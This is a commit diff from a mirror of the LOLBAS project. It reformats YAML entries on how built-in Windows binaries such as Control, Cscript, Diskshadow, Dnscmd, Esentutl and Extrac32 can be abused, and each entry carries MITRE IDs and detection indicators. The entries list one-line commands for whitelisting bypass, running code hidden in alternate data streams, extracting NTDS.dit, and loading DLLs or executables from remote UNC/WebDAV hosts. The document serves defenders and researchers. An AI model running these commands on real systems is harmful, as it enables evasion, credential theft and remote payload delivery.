mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Changed all OSBinaries according to the new template
This commit is contained in:
parent
68884a4c13
commit
37cc1ee83e
@ -30,11 +30,15 @@ function Convert-YamlToMD
|
||||
"description: $($YamlObject.Description)"| Add-Content $Outfile
|
||||
"function:"| Add-Content $Outfile
|
||||
# Need a category linked to the different things... Execute, Download, AWL-bypass.
|
||||
" execute:"| Add-Content $Outfile
|
||||
|
||||
foreach($cmd in $YamlObject.Commands)
|
||||
{
|
||||
" - description: $($cmd.description)"| Add-Content $Outfile
|
||||
" code: $($cmd.command)"| Add-Content $Outfile
|
||||
" $($cmd.Category):"| Add-Content $Outfile
|
||||
" - description: $($cmd.Description)"| Add-Content $Outfile
|
||||
" code: $($cmd.Command)"| Add-Content $Outfile
|
||||
" code: $($cmd.Command)"| Add-Content $Outfile
|
||||
" mitreid: $($cmd.MitreID)"| Add-Content $Outfile
|
||||
" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
|
||||
}
|
||||
"resources:"| Add-Content $Outfile
|
||||
foreach($link in $YamlObject.Resources)
|
||||
@ -108,13 +112,11 @@ function Invoke-GenerateMD
|
||||
|
||||
#Generate the stuff!
|
||||
#Bins
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
|
||||
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherBinaries" -Outpath "c:\tamp\OtherBinaries" -Verbose
|
||||
#
|
||||
|
||||
##Scripts
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherScripts" -Outpath "c:\tamp\OtherScripts" -Verbose
|
||||
#
|
||||
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\SCripts" -Verbose
|
||||
|
||||
##Libs
|
||||
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose
|
||||
#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose
|
@ -17,4 +17,4 @@ Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||
* C:\Windows\sysWOW64\control.exe
|
||||
|
||||
* Notes: Thanks to Jimmy - @bohops
|
||||
|
||||
|
@ -18,4 +18,4 @@ csc -target:library File.cs
|
||||
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
|
||||
* Notes: Thanks to ?
|
||||
|
||||
|
@ -15,4 +15,4 @@ Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data St
|
||||
* c:\windows\sysWOW64\cscript.exe
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
||||
|
@ -13,8 +13,8 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- path: C:\Windows\System32\Atbroker.exe
|
||||
- path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
|
@ -21,8 +21,8 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
- path: C:\Windows\System32\bash.exe
|
||||
- path: C:\Windows\SysWOW64\bash.exe
|
||||
- Path: C:\Windows\System32\bash.exe
|
||||
- Path: C:\Windows\SysWOW64\bash.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
|
@ -1,5 +1,5 @@
|
||||
---
|
||||
Name: bitsadmin.exe
|
||||
Name: Bitsadmin.exe
|
||||
Description: Used for managing background intelligent transfer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
@ -37,8 +37,8 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- path: C:\Windows\System32\bitsadmin.exe
|
||||
- path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||
- Path: C:\Windows\System32\bitsadmin.exe
|
||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
|
@ -37,8 +37,8 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- path: C:\Windows\System32\certutil.exe
|
||||
- path: C:\Windows\SysWOW64\certutil.exe
|
||||
- Path: C:\Windows\System32\certutil.exe
|
||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
|
@ -13,8 +13,8 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- path: C:\Windows\System32\cmdkey.exe
|
||||
- path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
|
@ -21,8 +21,8 @@ Commands:
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- path: C:\Windows\System32\cmstp.exe
|
||||
- path: C:\Windows\SysWOW64\cmstp.exe
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
|
@ -1,21 +1,31 @@
|
||||
---
|
||||
Name: Control.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Description: Binary used to launch controlpanel items in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: control.exe c:\windows\tasks\file.txt:evil.dll
|
||||
Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1196
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- 'C:\Windows\system32\control.exe '
|
||||
- 'C:\Windows\sysWOW64\control.exe '
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\control.exe
|
||||
- Path: C:\Windows\SysWOW64\control.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Control.exe executing files from alternate data streams.
|
||||
Resources:
|
||||
- https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
|
||||
- https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
|
||||
- https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
|
||||
- https://twitter.com/bohops/status/955659561008017409
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
|
||||
- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
|
||||
- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
|
||||
- Link: https://twitter.com/bohops/status/955659561008017409
|
||||
- Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items
|
||||
- Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
@ -1,21 +1,35 @@
|
||||
---
|
||||
Name: Csc.exe
|
||||
Description: Compile
|
||||
Author: ''
|
||||
Description: Binary file used by .NET to compile C# code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: csc -out:My.exe File.cs
|
||||
- Command: csc.exe -out:My.exe File.cs
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: csc -target:library File.cs
|
||||
Description: ''
|
||||
Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
Category: Compile
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||
Resources:
|
||||
- https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||
- ''
|
||||
Notes: Thanks to ?
|
||||
|
||||
- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
@ -1,19 +1,28 @@
|
||||
---
|
||||
Name: Cscript.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Description: Binary used to execute scripts in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: cscript c:\ads\file.txt:script.vbs
|
||||
Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\cscript.exe
|
||||
- c:\windows\sysWOW64\cscript.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\cscript.exe
|
||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Cscript.exe executing files from alternate data streams
|
||||
Resources:
|
||||
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,19 +1,29 @@
|
||||
---
|
||||
Name: Dfsvc.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: ClickOnce engine in Windows used by .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Missing Example
|
||||
Description: ''
|
||||
- Command: Missing Example
|
||||
Description: Missing example
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe '
|
||||
- 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe '
|
||||
- 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe '
|
||||
- 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe '
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
@ -1,20 +1,36 @@
|
||||
---
|
||||
Name: Diskshadow.exe
|
||||
Description: Execute, Dump NTDS.dit
|
||||
Author: ''
|
||||
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
||||
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||
Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit
|
||||
Category: Dump
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows server
|
||||
- Command: diskshadow> exec calc.exe
|
||||
Description: Execute a calc.exe using diskshadow.exe.
|
||||
Description: Execute commands using diskshadow.exe to spawn child process
|
||||
Usecase: Use diskshadow to bypass defensive counter measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows server
|
||||
Full Path:
|
||||
- c:\windows\system32\diskshadow.exe
|
||||
- c:\windows\sysWOW64\diskshadow.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\diskshadow.exe
|
||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from diskshadow.exe
|
||||
- IOC: Diskshadow reading input from file
|
||||
Resources:
|
||||
- https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
|
||||
Notes: Thanks to Jimmy - @bohops
|
||||
|
||||
- Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
@ -1,27 +0,0 @@
|
||||
---
|
||||
Name: Dnscmd.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
Description: 'Adds a specially crafted DLL as a plug-in of the DNS Service.'
|
||||
Full Path:
|
||||
- c:\windows\system32\Dnscmd.exe
|
||||
- c:\windows\sysWOW64\Dnscmd.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
||||
- https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
||||
- https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
|
||||
- https://twitter.com/Hexacorn/status/994000792628719618
|
||||
- http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
|
||||
Notes: |
|
||||
This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details.
|
||||
Thanks to Shay Ber - ?,
|
||||
Dimitrios Slamaris - @dim0x69,
|
||||
Nikhil SamratAshok,
|
||||
Mittal - @nikhil_mitt
|
||||
|
35
yml/OSBinaries/Dnscmd.yml
Normal file
35
yml/OSBinaries/Dnscmd.yml
Normal file
@ -0,0 +1,35 @@
|
||||
---
|
||||
Name: Dnscmd.exe
|
||||
Description: A command-line interface for managing DNS servers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Commands:
|
||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||
Usecase: Remotly inject dll to dns server
|
||||
Category: Execute
|
||||
Privileges: DNS admin
|
||||
MitreID: T1035
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1035
|
||||
OperatingSystem: Windows server
|
||||
Full Path:
|
||||
- Path: C:\Windows\System32\Dnscmd.exe
|
||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Dnscmd.exe loading dll from UNC path
|
||||
Resources:
|
||||
- Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
|
||||
- Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
|
||||
- Link: https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
|
||||
- Link: https://twitter.com/Hexacorn/status/994000792628719618
|
||||
- Link: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
|
||||
Acknowledgement:
|
||||
- Person: Shay Ber
|
||||
Handle:
|
||||
- Person: Dimitrios Slamaris
|
||||
Handle: '@dim0x69'
|
||||
- Person: Nikhil SamratAshok
|
||||
Handle: '@nikhil_mitt'
|
||||
---
|
@ -1,28 +1,59 @@
|
||||
---
|
||||
Name: Esentutl.exe
|
||||
Description: Copy, Download, Write ADS, Read ADS
|
||||
Author: ''
|
||||
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||
Description: Copies the source VBS file to the destination VBS file.
|
||||
Usecase: Copies files from A to B
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
|
||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
|
||||
Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
|
||||
- Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
- Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
|
||||
Description: Copies the source EXE to the destination EXE file.
|
||||
Usecase: Extract hidden file within alternate data streams
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
|
||||
Description: Copies the source EXE to the destination EXE file
|
||||
Usecase: Use to copy files from one unc path to another
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\esentutl.exe
|
||||
- c:\windows\sysWOW64\esentutl.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\esentutl.exe
|
||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://twitter.com/egre55/status/985994639202283520
|
||||
Notes: Thanks to egre55 - @egre55
|
||||
|
||||
- Link: https://twitter.com/egre55/status/985994639202283520
|
||||
Acknowledgement:
|
||||
- Person: egre55
|
||||
Handle: '@egre55'
|
||||
---
|
@ -1,23 +1,46 @@
|
||||
---
|
||||
Name: Expand.exe
|
||||
Description: Download, Copy, Add ADS
|
||||
Author: ''
|
||||
Description: Binary that expands one or more compressed files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||
Description: 'Copies source file to destination.'
|
||||
Description: Copies source file to destination.
|
||||
Usecase: Use to copies the source file to the destination file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
|
||||
Description: 'Copies source file to destination.'
|
||||
Description: Copies source file to destination.
|
||||
Usecase: Copies files from A to B
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
|
||||
Description: 'Copies source file to destination Alternate Data Stream (ADS).'
|
||||
Description: Copies source file to destination Alternate Data Stream (ADS)
|
||||
Usecase: Copies files from A to B
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\Expand.exe
|
||||
- c:\windows\sysWOW64\Expand.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\Expand.exe
|
||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://twitter.com/infosecn1nja/status/986628482858807297
|
||||
- https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||
Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
||||
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||
Acknowledgement:
|
||||
- Person: Rahmat Nurfauzi
|
||||
Handle: '@infosecn1nja'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,18 +1,27 @@
|
||||
---
|
||||
Name: Extexport.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Extexport.exe c:\test foo bar
|
||||
Description: 'Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll'
|
||||
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||
Usecase: Execute dll file
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- 'C:\Program Files\Internet Explorer\Extexport.exe '
|
||||
- C:\Program Files\Internet Explorer(x86)\Extexport.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||
- Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||
Resources:
|
||||
- http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
|
||||
Notes: Thanks to Adam - @hexacorn
|
||||
|
||||
- Link: http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
@ -1,24 +1,47 @@
|
||||
---
|
||||
Name: Extrac32.exe
|
||||
Description: Add ADS, Download
|
||||
Author: ''
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||
Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
|
||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||
Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
|
||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
|
||||
Description: 'Copy the source file to the destination file and overwrite it.'
|
||||
Description: Copy the source file to the destination file and overwrite it.
|
||||
Usecase: Download file from UNC/WEBDav
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\extrac32.exe
|
||||
- c:\windows\sysWOW64\extrac32.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\extrac32.exe
|
||||
